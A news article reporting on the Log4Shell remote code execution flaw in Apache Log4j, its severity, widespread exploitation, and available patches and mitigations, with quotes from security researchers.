The Apache Software Foundation has released patches to address an actively exploited zero-day vulnerability in the widely used Apache Log4j Java-based logging library which could be used to execute malicious code and take complete control of vulnerable systems.
The issue tracked as CVE-2021-44228 and known as Log4Shell or LogJam, involves an unauthenticated, remote code execution (RCE) on any application that uses the open-source utility and affects Log4j 2.0-beta9 up to 2.14.1. The bug received a perfect 10 out of 10 in the CVSS rating system, indicating the severity of the problem.
The Apache Foundation advised that “When message lookup substitution is enabled, an attacker with control over log messages or log message parameters can execute arbitrary code loaded from LDAP servers . This behaviour is now disabled by default in Log4j 2.15.0.”
Log4j is used as a logging package in a wide range of popular software such as Amazon, Apple iCloud, Cisco, Cloudflare, ElasticSearch, Red Hat, Steam, Tesla, Twitter and video games like Minecraft. In the latter case, attackers were able to gain RCE on Minecraft servers simply by pasting a specially crafted message into the chat box.
Bharat Jogi, Qualys’ senior manager of vulnerabilities and signatures. reported that “The Apache Log4j zero-day vulnerability is probably the most critical vulnerability we’ve seen this year, Log4j is a widely used library for logging error messages that is used by millions of Java applications. This flaw is extremely simple to exploit.”
Following the availability of a proof-of-concept (PoC) exploit, cybersecurity firms BitDefender, Cisco Talos, Huntress Labs, and Sonatype have all confirmed evidence of mass scanning of affected applications in the wild for vulnerable servers and attacks registered against their honeypot networks. “This is a low skill attack that is extremely simple to execute,” replied Ilkka Turunen of Sonatype.
GreyNoise, which compares the flaw to Shellshock, reported malicious activity targeting the vulnerability beginning on December 9, 2021. Cloudflare, a web infrastructure company, noted blocking approximately 20,000 exploit requests per minute around 6:00 p.m. UTC on Friday, with the majority of the exploitation attempts coming from Canada, the United States, the Netherlands, France, and the United Kingdom.
Finally Marcus Hutchins, a security expert concluded that ,” Cybereason, an Israeli cybersecurity firm has also released a fix called “Logout4Shell” that addresses the flaw by reconfiguring the logger using the vulnerability itself to prevent further exploitation of the attack. This Log4j (CVE-2021-44228) flaw is extremely serious. Log4j is used by millions of applications for logging, and all the attacker needs to do is get the app to log a special string .”